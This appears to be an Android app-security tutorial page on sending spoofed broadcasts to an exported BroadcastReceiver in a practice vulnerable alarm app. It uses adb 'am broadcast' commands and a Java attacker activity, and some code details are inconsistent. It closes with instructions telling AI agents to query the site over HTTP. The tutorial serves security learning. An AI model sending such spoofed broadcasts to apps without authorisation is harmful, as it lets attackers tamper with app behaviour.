# BroadcastReceiver Hacking #### How to Send a Broadcast Using Activity Manager (am) in Android In Android, you can send broadcasts to receivers defined in the `AndroidManifest.xml`. Here’s a detailed guide on how to do this effectively. **Defining Intent Filters in `AndroidManifest.xml`** First, define your receiver and its intent filters in the `AndroidManifest.xml`. For example: ```xml

``` In our example application, the receiver is configured to listen for two actions: `BOOT_COMPLETED` and `LOCKED_BOOT_COMPLETED`.

**Sending a Broadcast Using `adb`** To send a broadcast to this receiver using `adb shell`, you can utilize the `am` (Activity Manager) command. Here’s how to send a `BOOT_COMPLETED` broadcast: ```sh adb shell am broadcast -a android.intent.action.BOOT_COMPLETED ``` After executing this command, you should observe in logcat that the application is handling the broadcast, possibly performing a system reset.

**Compatibility with Newer Android Versions** The above method works for older versions of Android. For Android 8.0 (Oreo) and higher, broadcast receivers need to be registered in the Java code, not just in the manifest.

**Checking the `onReceive` Method** Let’s examine the `onReceive` method in your BroadcastReceiver. Typically, it might process extras included in the broadcast intent. For example, it could be looking for an extra with the key `status`: ```java @Override public void onReceive(Context context, Intent intent) { String status = intent.getStringExtra("status"); if ("hacked".equals(status)) { // Handle the "hacked" status } else if ("arm".equals(status)) { // Handle the "arm" status } } ``` **Here is what we got in our vuln-app**

**Sending a Custom Broadcast** To test your receiver by sending a custom broadcast with an extra value, use the `am` command. For instance, to send a status of "hacked", execute: ```sh adb shell am broadcast -a com.apphacking.broadcastreceiver.alarmState -es "status" "hacked" ```

You should see logcat messages indicating that the application has processed the "hacked" status.

**Arming the Alarm System** Similarly, to arm the alarm system, you can send a broadcast with the status set to "arm": ```sh adb shell am broadcast -a com.apphacking.broadcastreceiver.alarmState -es "status" "arm" ```

By following these steps, you can effectively send broadcasts using the Activity Manager in Android, whether you are working with older versions or the latest ones.

### SO our Hacking App's **`MainActivity.java`** code ```java package com.apphacking.broadcasthacking; import androidx.appcompat.app.AppCompatActivity; import android.content.Intent; import android.os.Bundle; import android.view.View; public class MainActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); } public void disarmAlarmSystem(View view) { Intent intent = new Intent(); intent.setAction("com.apphacking.broadcastreceiver.alarmState"); intent.putExtra("status","arm"); sendBroadcast(intent); } } ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sallam.gitbook.io/sec-88/android-appsec/broadcastreceiver-hacking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.